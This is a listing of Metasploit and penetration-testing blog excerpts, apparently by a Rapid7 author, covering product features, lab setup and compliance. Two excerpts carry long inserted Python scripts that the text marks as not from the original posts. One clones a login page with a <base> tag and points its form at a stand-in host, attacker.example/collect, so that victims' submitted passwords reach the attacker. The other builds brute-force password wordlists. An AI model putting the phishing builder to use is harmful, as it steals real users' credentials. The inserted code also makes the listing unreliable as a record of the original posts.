Posts by Christian Kirsch

1 min Metasploit

Creating a FISMA report in Metasploit Pro

If you're working in IT security in U.S. federal government, chances are that you have to comply with the Federal Information Security Management Act of 2002 (FISMA). With Metasploit Pro, you can generate FISMA compliance reports that map penetration testing findings to controls, as recommended by Special Publication 800-53a (Appendix G) published by the National Institute of Standards and Technology (NIST) and by Consensus Audit Guidelines issued by a number of constituents including NIST and f

1 min Metasploit

Pentest Web Servers You Didn't Know You Had

Most web application security testing tools take the approach of going deep into a single application to uncover the issues inside it. There's nothing wrong with this approach if you want to do a deep dive into one specific web application, especially if it is a major application exposed on the Web. The other approach is to find out which web servers are running on a network and to check, with quick and scalable testing, whether they can be exploited. This is the approach Metasploit Pro takes.

3 min Metasploit

How to leverage the command line in Metasploit Pro

"I'm more comfortable with the Metasploit command line," is an objection I often hear from long-time Metasploit Framework users who are thinking about purchasing a copy of Metasploit Pro or Metasploit Express. What many penetration testers don't know is that you can use the command line in the commercial Metasploit editions, and leverage their advantages at the same time. Reporting: The commercial Metasploit editions include one-click reporting that includes any work you have completed on the

1 min Metasploit

Jumping to another network with VPN pivoting

VPN Pivoting is one of the best but also most elusive features in Metasploit Pro, so the best way to explain it is to show it. That's why I've decided to post a snippet of a recent webinar, where HD Moore shows this feature in action. VPN pivoting enables users to route any network traffic through an exploited host with two NICs to a different network. For example, you could run nmap, Metasploit network discovery, or Nexpose vulnerability scans through the VPN pivot. Using a TUN/TAP adaptor on the Metasploit

1 min Penetration Testing

On-demand Webcast: How to Set Up a Penetration Testing Lab

The recording of the webinar "How to set up a penetration testing test lab" is now online [http://www.rapid7.com/resources/webcast-pentest-lab.jsp]. Big thanks to Matt for a great presentation, and huge thanks to all of the participants for the great questions and input, which I've included in the Q&A transcription. Webinar resources: * Webinar recording [http://www.rapid7.com/resources/webcast-pentest-lab.jsp] * Webinar slides [https://community.rapid7.com/docs/DOC-1625] Related blog po

1 min Penetration Testing

10 Places to Find Vulnerable Machines for Your Lab

It can sometimes be challenging to find vulnerable machines for your penetration testing or vulnerability management lab. Here's a list of vulnerable machines you should check out: 1. Metasploitable [http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web] 2. UltimateLAMP [http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip] 3. Web Security Dojo [http://sourceforge.net/projects/websecuritydojo/files/] 4. OWASP Hackademics [https://code.google.com/p/owasp-ha

1 min Penetration Testing

Using the <base> tag to clone a web page for social engineering attacks

Social engineering campaigns can be a lot more effective if you can impersonate a well-known website that users trust. However, when you simply clone a website by cutting-and-pasting the page source and putting it on your own server, your links will stop working. Copying all links and images from the other site can be cumbersome, but there's an alternative: the HTML <base> tag. It specifies a default address/target for all links on a page; it is inserted into the head element. Let's say you've
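As an added example (not code from the original post), the script below does the edit the paragraph describes on a constructed page source: it inserts `<base href="...">` as the first child of `<head>` so that every relative `href`/`src` resolves against the original site. It also handles the catch a practitioner runs into: a relative `action` on the cloned login form resolves against the base too, so the form would post back to the real site unless its action is made absolute. The page HTML, `ORIGINAL_URL` and `CAPTURE_URL` are hypothetical values for illustration.

```python
"""Insert an HTML <base> element into a cloned page so relative links keep working."""
import re
from urllib.parse import urljoin

# Constructed sample: the source of a page cloned from a hypothetical site.
CLONED_HTML = """<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<link rel="stylesheet" href="/static/site.css">
</head>
<body>
<img src="images/logo.png">
<form action="/account/login" method="post">
<input name="user"><input name="pass" type="password">
</form>
</body>
</html>
"""

ORIGINAL_URL = "https://www.example.com/account/login"  # hypothetical page that was cloned
CAPTURE_URL = "https://attacker.example/collect"         # hypothetical server the tester controls

HEAD_RE = re.compile(r"<head(\s[^>]*)?>", re.IGNORECASE)
BASE_RE = re.compile(r"<base\b[^>]*>", re.IGNORECASE)
ACTION_RE = re.compile(r'(<form\b[^>]*\baction=")([^"]*)(")', re.IGNORECASE)


def add_base_tag(html: str, original_url: str) -> str:
    """Insert <base href=original_url> right after the opening <head> tag.

    Browsers resolve every relative URL on the page (href, src, action, ...)
    against the base, so the clone loads stylesheets and images from the real site.
    """
    if BASE_RE.search(html):
        return html  # a page may carry only one <base>; leave an existing one alone
    m = HEAD_RE.search(html)
    if not m:
        raise ValueError("no <head> element found")
    base = f'<base href="{original_url}">'
    return html[: m.end()] + "\n" + base + html[m.end():]


def point_forms_at(html: str, capture_url: str) -> str:
    """Caveat: <base> also applies to relative form actions, so a cloned login form
    would submit to the original site. Make the action absolute so it reaches us."""
    return ACTION_RE.sub(lambda m: m.group(1) + capture_url + m.group(3), html)


def resolve(html: str, attr_value: str) -> str:
    """Resolve a relative attribute value the way a browser will, honouring <base>."""
    m = BASE_RE.search(html)
    href = re.search(r'href="([^"]*)"', m.group(0)).group(1) if m else ""
    return urljoin(href, attr_value)


def clone_with_base(html: str, original_url: str, capture_url: str) -> str:
    """Apply both steps: add the base and redirect the form to our server."""
    return point_forms_at(add_base_tag(html, original_url), capture_url)


if __name__ == "__main__":
    print(clone_with_base(CLONED_HTML, ORIGINAL_URL, CAPTURE_URL))
```

`resolve()` is there to check the result: with the base in place, `images/logo.png` resolves to `https://www.example.com/account/images/logo.png` and `/static/site.css` to `https://www.example.com/static/site.css`, which is exactly what the browser will request when it renders the clone.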

1 min Skills

Metasploit Tutorial: An introduction to Metasploit Community

Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. If you don't have them already, download the free Metasploit Comm

3 min Metasploit

Installing Metasploit Community Edition on BackTrack 5 R1

Update: I just published a new blog post for using Metasploit on BackTrack 5 R2 [/2012/05/30/install-metasploit-on-backtrack]. BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available,

1 min Metasploit

Adding custom wordlists in Metasploit for brute force password audits

In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples: * If you are security testing a hospital, you may want to add a dictionary with medical terms. * If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist. * Another good idea is to build a custom wordlist b
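As an added example (not code from the original post), the script below builds an organization-specific wordlist from a handful of seed terms of the kind the post suggests collecting: it expands each term into case and leet-speak variants, appends common suffixes, drops candidates that are too short to be plausible passwords, and writes one candidate per line, the plain-text format password-audit tools (including Metasploit's `PASS_FILE` option in the framework's login scanners) read. The seed terms, suffix list and minimum length are assumptions chosen for illustration.

```python
"""Build an organization-specific wordlist for a brute-force password audit."""
import itertools

# Constructed seeds: terms a tester might collect for a hypothetical hospital client.
SEEDS = ["mercy", "cardiology", "Krankenhaus", "stlukes"]

# Common substitutions users apply to a base word (assumed list, extend as needed).
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ["", "!", "1", "123", "2011", "2012"]


def variants(word: str) -> list:
    """Return case variants of a seed term, each with and without leet substitutions."""
    forms = {word.lower(), word.capitalize(), word.upper()}
    forms |= {f.translate(LEET) for f in list(forms)}
    return sorted(forms)


def build_wordlist(seeds, suffixes=SUFFIXES, min_len=6) -> list:
    """Combine every variant with every suffix, drop short entries, keep first-seen order.

    Deduplicating matters: login modules try each line, so repeats only cost time
    and add noise to the target's authentication logs.
    """
    seen, out = set(), []
    for seed in seeds:
        for form, suffix in itertools.product(variants(seed), suffixes):
            cand = form + suffix
            if len(cand) >= min_len and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def format_wordlist(words) -> str:
    """One candidate per line, trailing newline, as wordlist files are expected."""
    return "".join(w + "\n" for w in words)


def write_wordlist(path: str, words) -> int:
    """Write the list to disk and return the number of candidates written."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(format_wordlist(words))
    return len(words)


if __name__ == "__main__":
    words = build_wordlist(SEEDS)
    print(write_wordlist("hospital_wordlist.txt", words), "candidates written")
```

For a German client you would feed German seed terms (and German-language dictionaries) through the same function; the mutation rules do not care about the language of the seeds.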

2 min Metasploit

Three Great New Metasploit Books

I've seen three great Metasploit books published lately. The one that most people are probably already familiar with is Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni. The book is very comprehensive, and packed full of great advice. David Kennedy is Chief Information Security Officer at Diebold Incorporated and creator of the Social-Engineer Toolkit (SET), Fast-Track, and other open source tools, so he really knows his stuff. By the way,

1 min Metasploit

Joshua Corman discovers HD Moore's Law

At Metricon6 and later on his blog Cognitive Dissidents [http://cognitivedissidents.wordpress.com/2011/11/01/intro-to-hdmoores-law/], Joshua Corman presented his latest discovery - HD Moore's Law: "Casual Attacker power grows at the rate of Metasploit" Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure. HD Moore created the Metasploit Project in 2003 to provide the security community with a public resou

1 min Penetration Testing

Getting Management Buy-In for Penetration Testing

I often hear from technical IT folks that communicating the benefit of a penetration test is difficult, especially to a business audience. "You want me to authorize you to break into my systems?" they ask. We are all afraid of things we don't understand. This is why you should first make your management comfortable with the concept of penetration testing. Why don't you try this example: We should all visit our doctor for regular medical check-ups, even when we feel healthy. This is the only way

2 min Metasploit

PCI DIY: How to do an internal penetration test to satisfy PCI DSS requirement 11.3

If you're accepting or processing credit cards and are therefore subject to PCI DSS, you'll likely be familiar with requirement 11.3, which demands that you "perform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification". What most companies don't know is that you don't have to hire an external penetration testing consultant - you can carry out the penetration test internally, provided you follow some simple rules: * Sufficie

1 min Metasploit

How to update to Metasploit 4.0

If you're packing to go to Black Hat, Defcon or Security B-Sides in Las Vegas, make sure you also download Metasploit 4.0 to entertain you on the plane ride. If you missed the recent announcement, check out this blog post [/2011/07/26/metasploit-pro-40-brings-greater-enterprise-integration-cloud-deployment-options-and-penetration-testing-automation] for a list of new features. The new version is now available for all editions, and here's how you upgrade: * Metasploit Pro and Metasploit Expre